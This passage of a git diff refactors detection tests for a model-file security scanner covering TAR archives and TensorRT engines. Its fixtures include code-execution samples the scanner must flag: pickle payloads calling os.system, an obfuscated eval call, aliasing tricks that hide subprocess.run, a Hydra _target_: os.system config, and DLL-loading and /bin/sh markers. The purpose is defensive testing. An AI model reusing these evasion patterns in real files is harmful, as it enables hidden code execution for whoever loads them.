Replace:\n" + b" globals()['os'] = Safe\nos.system('safe')\n" + ), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - assert not any(check.name == "Python Archive Member Security" for check in result.checks) - def test_scan_tar_ignores_definite_safe_module_namespace_overwrite(self, tmp_path: Path) -> None: """A definitely executed safe mapping overwrite should suppress a stale alias.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"import os\nrunner = os.system\nif True:\n globals()['runner'] = print\nglobals()['runner']('safe')\n" + self._assert_tar_python_without_finding( + tmp_path, + ( + b"import os\nrunner = os.system\nif True:\n globals()['runner'] = print\n" + b"globals()['runner']('safe')\n" + ), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - assert not any(check.name == "Python Archive Member Security" for check in result.checks) - @pytest.mark.parametrize( "payload", [ @@ -711,128 +618,82 @@ def test_scan_tar_ignores_benign_namespace_defaults_and_comprehension_locals( """Definite safe namespace values and nested comprehension locals should stay clean.""" archive_path = tmp_path / "model_bundle.tar" - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "handler.py") assert not any(check.name == "Python Archive Member Security" for check in result.checks) def test_scan_tar_flags_implicit_builtins_mapping_dangerous_python_member(self, tmp_path: Path) -> None: """Implicit builtins mapping lookup must not hide a risky call.""" - archive_path = tmp_path / "model_bundle.tar" - payload = b"__builtins__['ev' + 'al']('1 + 1')\n" - - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].rule_code == "S104" - assert python_checks[0].details["reason"] == "high-risk calls: builtins.eval" + self._assert_tar_namespaced_call( + tmp_path, + (b"__builtins__['ev' + 'al']('1 + 1')\n"), + ("handler.py"), + ("S104"), + ("high-risk calls: builtins.eval"), + ) def test_scan_tar_flags_rebound_dangerous_python_member(self, tmp_path: Path) -> None: """Callable rebindings should not bypass generic TAR Python member scanning.""" - archive_path = tmp_path / "model_bundle.tar" - payload = b"import subprocess\nrunner = subprocess.run\nrunner(['echo', 'hidden'], check=False)\n" + self._assert_tar_aliased_call( + tmp_path, + (b"import subprocess\nrunner = subprocess.run\nrunner(['echo', 'hidden'], check=False)\n"), + ("high-risk calls: subprocess.run"), + ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] + def _assert_tar_member_subprocess_call(self, tmp_path: Path, source_bytes: bytes) -> None: + archive_path = tmp_path / "model_bundle.tar" + payload = source_bytes - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "handler.py") python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] assert len(python_checks) == 1 assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].severity == IssueSeverity.WARNING assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" def test_scan_tar_import_aliases_are_scoped_per_python_member(self, tmp_path: Path) -> None: """Local imports in one scope should not hide dangerous calls in another scope.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"import subprocess\n" - b"def helper() -> str:\n" - b" import os as subprocess\n" - b" return subprocess.getcwd()\n" - b"def handler() -> None:\n" - b" subprocess.run(['echo', 'hidden'], check=False)\n" + # type: ignore[attr-defined] + self._assert_tar_member_subprocess_call( + tmp_path, + ( + b"import subprocess\n" + b"def helper() -> str:\n" + b" import os as subprocess\n" + b" return subprocess.getcwd()\n" + b"def handler() -> None:\n" + b" subprocess.run(['echo', 'hidden'], check=False)\n" + ), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" - def test_scan_tar_method_does_not_capture_class_attribute_alias(self, tmp_path: Path) -> None: """Class attributes are not lexical aliases inside method bodies.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"import subprocess\n" - b"class Handler:\n" - b" subprocess = None\n" - b" def run(self) -> None:\n" - b" subprocess.run(['echo', 'hidden'], check=False)\n" + # type: ignore[attr-defined] + self._assert_tar_member_subprocess_call( + tmp_path, + ( + b"import subprocess\n" + b"class Handler:\n" + b" subprocess = None\n" + b" def run(self) -> None:\n" + b" subprocess.run(['echo', 'hidden'], check=False)\n" + ), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" - def test_scan_tar_empty_loop_target_does_not_hide_later_dangerous_call(self, tmp_path: Path) -> None: """Loop targets should not unconditionally shadow imports after a maybe-empty loop.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"import subprocess\nfor subprocess in ():\n pass\nsubprocess.run(['echo', 'hidden'], check=False)\n" + # type: ignore[attr-defined] + self._assert_tar_member_subprocess_call( + tmp_path, + (b"import subprocess\nfor subprocess in ():\n pass\nsubprocess.run(['echo', 'hidden'], check=False)\n"), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" - def test_scan_tar_nonempty_loop_target_shadows_dangerous_import(self, tmp_path: Path) -> None: """Definitely assigned loop targets should shadow imports after the loop.""" archive_path = tmp_path / "source_bundle.tar" payload = b"import subprocess\nfor subprocess in (object(),):\n pass\nsubprocess.run()\n" - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("preprocess.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "preprocess.py") assert result.success is True assert not any(check.name == "Python Archive Member Security" for check in result.checks) @@ -840,74 +701,39 @@ def test_scan_tar_nonempty_loop_target_shadows_dangerous_import(self, tmp_path: def test_scan_tar_conditional_target_does_not_hide_later_dangerous_call(self, tmp_path: Path) -> None: """Conditional assignments should not unconditionally shadow later imports.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"import subprocess\nif False:\n subprocess = None\nsubprocess.run(['echo', 'hidden'], check=False)\n" + # type: ignore[attr-defined] + self._assert_tar_member_subprocess_call( + tmp_path, + (b"import subprocess\nif False:\n subprocess = None\nsubprocess.run(['echo', 'hidden'], check=False)\n"), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" - def test_scan_tar_conditional_aliases_preserve_dangerous_branch(self, tmp_path: Path) -> None: """Ambiguous conditional aliases should preserve any high-risk branch.""" - archive_path = tmp_path / "model_bundle.tar" - payload = ( - b"if __name__:\n" - b" import subprocess as sp\n" - b"else:\n" - b" import os as sp\n" - b"sp.run(['echo', 'hidden'], check=False)\n" + # type: ignore[attr-defined] + self._assert_tar_member_subprocess_call( + tmp_path, + ( + b"if __name__:\n" + b" import subprocess as sp\n" + b"else:\n" + b" import os as sp\n" + b"sp.run(['echo', 'hidden'], check=False)\n" + ), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" - def test_scan_tar_loop_body_alias_survives_to_later_dangerous_call(self, tmp_path: Path) -> None: """Aliases imported in possible loop bodies should remain visible afterward.""" - archive_path = tmp_path / "model_bundle.tar" - payload = b"for _ in (1,):\n import subprocess as sp\nsp.run(['echo', 'hidden'], check=False)\n" - - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] - assert len(python_checks) == 1 - assert python_checks[0].status == CheckStatus.FAILED - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + # type: ignore[attr-defined] + self._assert_tar_member_subprocess_call( + tmp_path, (b"for _ in (1,):\n import subprocess as sp\nsp.run(['echo', 'hidden'], check=False)\n") + ) def test_scan_tar_marks_malformed_python_member_incomplete(self, tmp_path: Path) -> None: """Malformed Python source should fail closed instead of passing as benign.""" archive_path = tmp_path / "model_bundle.tar" payload = b"def handler(:\n pass\n" - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "handler.py") assert result.success is False assert result.metadata["analysis_incomplete"] is True @@ -918,54 +744,40 @@ def test_scan_tar_marks_malformed_python_member_incomplete(self, tmp_path: Path) assert python_checks[0].details["entry"] == "handler.py" assert python_checks[0].details["analysis_incomplete"] is True - def test_scan_tar_ignores_benign_python_member(self, tmp_path: Path) -> None: - """Benign Python source in generic TAR archives should not produce security findings.""" + def _assert_benign_tar_python(self, tmp_path: Path, source_bytes: bytes) -> None: archive_path = tmp_path / "model_bundle.tar" - source = b"def preprocess(value: str) -> str:\n return value.strip().lower()\n" + source = source_bytes - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("preprocess.py") - info.size = len(source) - archive.addfile(info, tarfile.io.BytesIO(source)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, source, "preprocess.py") assert result.success is True assert not any(check.name == "Python Archive Member Security" for check in result.checks) assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + def test_scan_tar_ignores_benign_python_member(self, tmp_path: Path) -> None: + """Benign Python source in generic TAR archives should not produce security findings.""" + self._assert_benign_tar_python( + tmp_path, (b"def preprocess(value: str) -> str:\n return value.strip().lower()\n") + ) + def test_scan_tar_ignores_benign_python_file_operations(self, tmp_path: Path) -> None: """Ordinary source file I/O should not be reported as active payload code.""" - archive_path = tmp_path / "model_bundle.tar" - source = ( - b"def load_config() -> tuple[str, str]:\n" - b" left = open('config-a.json', encoding='utf-8').read()\n" - b" right = open('config-b.json', encoding='utf-8').read()\n" - b" return left, right\n" + self._assert_benign_tar_python( + tmp_path, + ( + b"def load_config() -> tuple[str, str]:\n" + b" left = open('config-a.json', encoding='utf-8').read()\n" + b" right = open('config-b.json', encoding='utf-8').read()\n" + b" return left, right\n" + ), ) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("preprocess.py") - info.size = len(source) - archive.addfile(info, tarfile.io.BytesIO(source)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) - - assert result.success is True - assert not any(check.name == "Python Archive Member Security" for check in result.checks) - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - def test_scan_tar_flags_executable_member(self, tmp_path: Path) -> None: """TAR archives must surface executable-suffix members for parity with ZIP.""" archive_path = tmp_path / "model_bundle.tar" payload = b"#!/bin/sh\necho hidden\n" - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("bin/run.sh") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "bin/run.sh") executable_checks = [ check @@ -981,12 +793,7 @@ def test_scan_tar_flags_extensionless_executable_member(self, tmp_path: Path) -> archive_path = tmp_path / "model_bundle.tar" payload = b"\x7fELF" + b"\x00" * 64 - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("bin/runme") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "bin/runme") executable_checks = [ check @@ -1004,12 +811,7 @@ def test_scan_tar_marks_unconfirmed_pe_pointer_inconclusive(self, tmp_path: Path payload[:2] = b"MZ" payload[0x3C:0x40] = ((1024 * 1024) + 1).to_bytes(4, "little") - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("bin/runme") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "bin/runme") assert result.success is False assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME @@ -1045,12 +847,7 @@ def test_scan_tar_python_member_emits_accurate_rule_code( archive_path = tmp_path / "model_bundle.tar" source = source.replace(b"LIBRARY_PATH", repr(str(tmp_path / "libpayload.so")).encode()) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(source) - archive.addfile(info, tarfile.io.BytesIO(source)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, source, "handler.py") python_checks = [check for check in result.checks if check.name == "Python Archive Member Security"] assert len(python_checks) == 1 @@ -1071,12 +868,7 @@ def test_scan_tar_allows_shadowed_direct_python_member_primitives(self, tmp_path """Safe final bindings should not become ctypes or browser findings.""" archive_path = tmp_path / "model_bundle.tar" - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("handler.py") - info.size = len(source) - archive.addfile(info, tarfile.io.BytesIO(source)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, source, "handler.py") assert result.success is True assert not any(check.name == "Python Archive Member Security" for check in result.checks) @@ -1392,12 +1184,7 @@ def test_scan_tar_with_proto0_pickle_preserves_archive_context(self, tmp_path: P archive_path = tmp_path / "proto0_payload.tar" payload = b'cos\nsystem\n(S"echo pwned"\ntR.' - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("payload.txt") - info.size = len(payload) - archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, payload, "payload.txt") assert result.success is False assert result.has_errors is True @@ -1413,12 +1200,7 @@ def test_scan_extensionless_nested_gzip_recurses_by_header(self, tmp_path: Path) payload = b'cos\nsystem\n(S"echo tar gzip payload"\ntR.' compressed_payload = gzip.compress(payload) - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo("compressed_payload") - info.size = len(compressed_payload) - archive.addfile(info, tarfile.io.BytesIO(compressed_payload)) # type: ignore[attr-defined] - - result = self.scanner.scan(str(archive_path)) + result = self._scan_python_tar_member(archive_path, compressed_payload, "compressed_payload") assert result.success is False assert result.has_errors is True @@ -1759,52 +1541,14 @@ def test_compressed_tar_truncated_nemo_route_scans_reachable_root_config( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "_NEMO_ROUTE_MAX_BODY_SKIP_BYTES", 64) - archive_path = tmp_path / "large-archive.tar.gz" - - with tarfile.open(archive_path, "w:gz") as archive: - first_payload = b"x" * 128 - first_info = tarfile.TarInfo("large-weights.bin") - first_info.size = len(first_payload) - archive.addfile(first_info, tarfile.io.BytesIO(first_payload)) # type: ignore[attr-defined] - - config_payload = b"model:\n _target_: os.system\n" - config_info = tarfile.TarInfo("model_config.yaml") - config_info.size = len(config_payload) - archive.addfile(config_info, tarfile.io.BytesIO(config_payload)) # type: ignore[attr-defined] - - result = core.scan_file(str(archive_path), config={"cache_enabled": False}) - - assert result.scanner_name == "tar" - assert result.success is False - assert any(check.name == "CVE-2025-23304: Dangerous Hydra _target_" for check in result.checks) - assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) + _assert_truncated_nemo_tar_route(tmp_path, monkeypatch, ("large-archive.tar.gz")) def test_compressed_tar_raw_suffix_truncated_nemo_route_scans_reachable_root_config( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "_NEMO_ROUTE_MAX_BODY_SKIP_BYTES", 64) - archive_path = tmp_path / "large-archive.tar" - - with tarfile.open(archive_path, "w:gz") as archive: - first_payload = b"x" * 128 - first_info = tarfile.TarInfo("large-weights.bin") - first_info.size = len(first_payload) - archive.addfile(first_info, tarfile.io.BytesIO(first_payload)) # type: ignore[attr-defined] - - config_payload = b"model:\n _target_: os.system\n" - config_info = tarfile.TarInfo("model_config.yaml") - config_info.size = len(config_payload) - archive.addfile(config_info, tarfile.io.BytesIO(config_payload)) # type: ignore[attr-defined] - - result = core.scan_file(str(archive_path), config={"cache_enabled": False}) - - assert result.scanner_name == "tar" - assert result.success is False - assert any(check.name == "CVE-2025-23304: Dangerous Hydra _target_" for check in result.checks) - assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) + _assert_truncated_nemo_tar_route(tmp_path, monkeypatch, ("large-archive.tar")) def test_compressed_tar_truncated_nemo_route_allows_benign_root_config( self, @@ -1891,7 +1635,7 @@ def test_compound_tar_gz_total_budget_stops_before_member_body_reads( """Aggregate TAR budget should stop extraction without decompressing oversized member bodies.""" archive_path = tmp_path / "bounded-body.tar.gz" payload = b"\0" * (32 * 1024 * 1024) - gzip_read_bytes = 0 + gzip_read_bytes = [0] original_read = gzip.GzipFile.read with tarfile.open(archive_path, "w:gz") as archive: @@ -1899,11 +1643,7 @@ def test_compound_tar_gz_total_budget_stops_before_member_body_reads( info.size = len(payload) archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - def tracked_read(self: gzip.GzipFile, size: int = -1) -> bytes: - nonlocal gzip_read_bytes - data = original_read(self, size) - gzip_read_bytes += len(data) - return data + tracked_read = _track_read_bytes(original_read, gzip_read_bytes) monkeypatch.setattr(gzip.GzipFile, "read", tracked_read) @@ -1920,7 +1660,7 @@ def tracked_read(self: gzip.GzipFile, size: int = -1) -> bytes: aggregate_checks = [check for check in result.checks if check.name == "TAR Aggregate Size Limit Check"] assert result.success is False - assert gzip_read_bytes <= 64 * 1024 + assert gzip_read_bytes[0] <= 64 * 1024 assert any(check.status == CheckStatus.FAILED for check in aggregate_checks) assert "tar_total_size_limit_exceeded" in result.metadata["scan_outcome_reasons"] assert "max_file_read_size_exceeded" not in result.metadata["scan_outcome_reasons"] @@ -1931,7 +1671,7 @@ def test_gzip_tar_oversized_pax_header_is_bounded_before_materialization( """Large extension headers should fail closed before tarfile allocates their content.""" archive_path = tmp_path / "oversized-pax.tar.gz" long_name = "pax-" + ("a" * (8 * 1024 * 1024)) - gzip_read_bytes = 0 + gzip_read_bytes = [0] original_read = gzip.GzipFile.read with tarfile.open(archive_path, "w:gz", format=tarfile.PAX_FORMAT) as archive: @@ -1939,11 +1679,7 @@ def test_gzip_tar_oversized_pax_header_is_bounded_before_materialization( info.size = 0 archive.addfile(info, tarfile.io.BytesIO(b"")) # type: ignore[attr-defined] - def tracked_read(self: gzip.GzipFile, size: int = -1) -> bytes: - nonlocal gzip_read_bytes - data = original_read(self, size) - gzip_read_bytes += len(data) - return data + tracked_read = _track_read_bytes(original_read, gzip_read_bytes) monkeypatch.setattr(gzip.GzipFile, "read", tracked_read) @@ -1958,7 +1694,7 @@ def tracked_read(self: gzip.GzipFile, size: int = -1) -> bytes: stream_checks = [check for check in result.checks if check.name == "TAR Stream Budget"] assert result.success is False - assert gzip_read_bytes <= 64 * 1024 + assert gzip_read_bytes[0] <= 64 * 1024 assert len(stream_checks) == 1 assert stream_checks[0].status == CheckStatus.FAILED assert stream_checks[0].details["scan_outcome_reason"] == "tar_metadata_read_limit_exceeded" @@ -2288,14 +2024,10 @@ def test_scan_compressed_tar_continues_after_oversized_member_with_bounded_drain later_info.size = len(malicious_payload) archive.addfile(later_info, tarfile.io.BytesIO(malicious_payload)) # type: ignore[attr-defined] - bytes_read = 0 + bytes_read = [0] original_read = tar_scanner_module._TarBoundedStream.read - def tracked_read(self: Any, size: int = -1) -> bytes: - nonlocal bytes_read - data = original_read(self, size) - bytes_read += len(data) - return data + tracked_read = _track_read_bytes(original_read, bytes_read) monkeypatch.setattr(tar_scanner_module._TarBoundedStream, "read", tracked_read) @@ -2307,7 +2039,7 @@ def tracked_read(self: Any, size: int = -1) -> bytes: assert any(entry["path"].endswith("payload.bin") for entry in contents) assert any(entry["path"].endswith("payload.txt") for entry in contents) assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) - assert len(payload) <= bytes_read <= max_decompressed_bytes + assert len(payload) <= bytes_read[0] <= max_decompressed_bytes aggregate_checks = [check for check in result.checks if check.name == "TAR Aggregate Size Limit Check"] assert any(check.status == CheckStatus.PASSED for check in aggregate_checks) @@ -2691,20 +2423,7 @@ def test_dense_raw_tar_zero_tail_is_bounded( while archive.next() is not None: pass - class CountingReader: - def __init__(self, fileobj: BinaryIO) -> None: - self.fileobj = fileobj - self.bytes_read = 0 - - def read(self, size: int = -1) -> bytes: - data = self.fileobj.read(size) - self.bytes_read += len(data) - return data - - def __getattr__(self, name: str) -> Any: - return getattr(self.fileobj, name) - - fileobj = CountingReader(cast(BinaryIO, archive.fileobj)) + fileobj = _CountingReader(cast(BinaryIO, archive.fileobj)) archive.fileobj = cast(Any, fileobj) tail_end = archive_path.stat().st_size @@ -3434,24 +3153,11 @@ def test_scan_xz_tar_bounds_zero_stream_padding( archive_file.seek(padding_size - 1, os.SEEK_CUR) archive_file.write(b"\0") - class CountingReader: - def __init__(self, fileobj: BinaryIO) -> None: - self.fileobj = fileobj - self.bytes_read = 0 - - def read(self, size: int = -1) -> bytes: - data = self.fileobj.read(size) - self.bytes_read += len(data) - return data - - def __getattr__(self, name: str) -> Any: - return getattr(self.fileobj, name) - - readers: list[CountingReader] = [] + readers: list[_CountingReader] = [] original_init = tar_scanner_module._StrictConcatenatedDecompressionReader.__init__ def tracked_init(reader: Any, fileobj: BinaryIO, **kwargs: Any) -> None: - counting_reader = CountingReader(fileobj) + counting_reader = _CountingReader(fileobj) readers.append(counting_reader) original_init(reader, cast(BinaryIO, counting_reader), **kwargs) @@ -3593,12 +3299,7 @@ def test_core_tar_partial_nested_scan_without_findings_returns_exit_code_2(self, info.size = len(payload) archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - def nested_scan(_path: str, _config: dict[str, Any]) -> ScanResult: - nested_result = ScanResult(scanner_name="test_nested") - nested_result.finish(success=False) - return nested_result - - scan_kwargs: dict[str, Any] = {NESTED_SCAN_CALLBACK_CONFIG_KEY: nested_scan} + scan_kwargs: dict[str, Any] = {NESTED_SCAN_CALLBACK_CONFIG_KEY: scan_nested_unsuccessful} audit_result = core.scan_model_directory_or_file( str(archive_path), cache_enabled=False, @@ -3620,18 +3321,6 @@ def test_tar_nested_critical_finding_does_not_mark_archive_incomplete(self, tmp_ info.size = len(payload) archive.addfile(info, tarfile.io.BytesIO(payload)) # type: ignore[attr-defined] - def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: - nested_result = ScanResult(scanner_name="test_nested") - nested_result.add_check( - name="Nested Critical Finding", - passed=False, - message="Nested member is malicious", - severity=IssueSeverity.CRITICAL, - location=path, - ) - nested_result.finish(success=False) - return nested_result - result = TarScanner(config={NESTED_SCAN_CALLBACK_CONFIG_KEY: nested_scan}).scan(str(archive_path)) assert result.success is False @@ -3732,14 +3421,10 @@ def test_sparse_member_reserves_shared_work_before_compressed_body( archive_path.write_bytes( gzip.compress(_old_gnu_sparse_tar_bytes(extension_blocks=0, physical_size=physical_size)) ) - bytes_read = 0 + bytes_read = [0] original_read = tar_scanner_module._TarBoundedStream.read - def tracked_read(self: Any, size: int = -1) -> bytes: - nonlocal bytes_read - data = original_read(self, size) - bytes_read += len(data) - return data + tracked_read = _track_read_bytes(original_read, bytes_read) monkeypatch.setattr(tar_scanner_module._TarBoundedStream, "read", tracked_read) @@ -3756,7 +3441,7 @@ def tracked_read(self: Any, size: int = -1) -> bytes: assert any(check.status == CheckStatus.FAILED for check in aggregate_checks) assert not any(check.status == CheckStatus.PASSED for check in aggregate_checks) assert result.metadata["archive_uncompressed_size"] >= physical_size - assert bytes_read < physical_size + assert bytes_read[0] < physical_size def test_truncated_route_scans_config_reached_through_ancestor_symlink( self, @@ -3863,13 +3548,9 @@ def test_truncated_route_fails_closed_for_link_created_at_symlinked_root_config( assert "nemo_link_semantics_incomplete" in result.metadata["scan_outcome_reasons"] def test_empty_tar_prefix_does_not_hide_malicious_zip(self, tmp_path: Path) -> None: - class DangerousPayload: - def __reduce__(self) -> tuple[Any, tuple[str]]: - return (os.system, ("echo tar-prefix-zip",)) - zip_path = tmp_path / "payload.zip" with zipfile.ZipFile(zip_path, "w") as archive: - archive.writestr("data.pkl", pickle.dumps(DangerousPayload())) + archive.writestr("data.pkl", pickle.dumps(SystemCommandPayload("echo tar-prefix-zip", lambda: os.system))) polyglot_path = tmp_path / "payload.tar" payload = (b"\0" * 1024) + zip_path.read_bytes() @@ -3918,3 +3599,49 @@ def test_outer_nemo_skip_flag_does_not_leak_into_nested_tar( assert result.scanner_name == "nemo" assert result.success is False assert any(check.name == "CVE-2025-23304: Dangerous Hydra _target_" for check in result.checks) + + +def _track_read_bytes(original_read: Callable[..., bytes], bytes_read: list[int]) -> Callable[..., bytes]: + def tracked_read(self: Any, size: int = -1) -> bytes: + data = original_read(self, size) + bytes_read[0] += len(data) + return data + + return tracked_read + + +class _CountingReader: + def __init__(self, fileobj: BinaryIO) -> None: + self.fileobj = fileobj + self.bytes_read = 0 + + def read(self, size: int = -1) -> bytes: + data = self.fileobj.read(size) + self.bytes_read += len(data) + return data + + def __getattr__(self, name: str) -> Any: + return getattr(self.fileobj, name) + + +def _assert_truncated_nemo_tar_route(tmp_path: Path, monkeypatch: pytest.MonkeyPatch, filename: str) -> None: + monkeypatch.setattr(file_detection, "_NEMO_ROUTE_MAX_BODY_SKIP_BYTES", 64) + archive_path = tmp_path / filename + + with tarfile.open(archive_path, "w:gz") as archive: + first_payload = b"x" * 128 + first_info = tarfile.TarInfo("large-weights.bin") + first_info.size = len(first_payload) + archive.addfile(first_info, tarfile.io.BytesIO(first_payload)) # type: ignore[attr-defined] + + config_payload = b"model:\n _target_: os.system\n" + config_info = tarfile.TarInfo("model_config.yaml") + config_info.size = len(config_payload) + archive.addfile(config_info, tarfile.io.BytesIO(config_payload)) # type: ignore[attr-defined] + + result = core.scan_file(str(archive_path), config={"cache_enabled": False}) + + assert result.scanner_name == "tar" + assert result.success is False + assert any(check.name == "CVE-2025-23304: Dangerous Hydra _target_" for check in result.checks) + assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) diff --git a/tests/scanners/test_tensorrt_scanner.py b/tests/scanners/test_tensorrt_scanner.py index e64d37396..0a4105be6 100644 --- a/tests/scanners/test_tensorrt_scanner.py +++ b/tests/scanners/test_tensorrt_scanner.py @@ -188,13 +188,7 @@ def test_tensorrt_scanner_detects_uppercase_and_shared_library_paths(tmp_path: P def test_tensorrt_scanner_detects_windows_dll_plugin_markers(tmp_path: Path) -> None: path = tmp_path / "malicious.engine" - path.write_bytes(b"plugin=malicious_plugin.dll\x00LoadLibraryExW\x00") - - result = TensorRTScanner().scan(str(path)) - - assert result.success is False - matched_patterns = {issue.details.get("pattern") for issue in result.issues} - assert {".dll", "LoadLibrary"}.issubset(matched_patterns) + _assert_tensorrt_markers(path, b"plugin=malicious_plugin.dll\x00LoadLibraryExW\x00", ".dll", "LoadLibrary") def test_tensorrt_scanner_detects_embedded_pe_header(tmp_path: Path) -> None: @@ -333,13 +327,7 @@ def test_tensorrt_scanner_avoids_elf_and_plugin_entry_point_near_match_false_pos def test_tensorrt_scanner_detects_exec_and_eval_tokens_with_arguments(tmp_path: Path) -> None: path = tmp_path / "malicious.engine" - path.write_bytes(b"execve /bin/sh\nexecvp 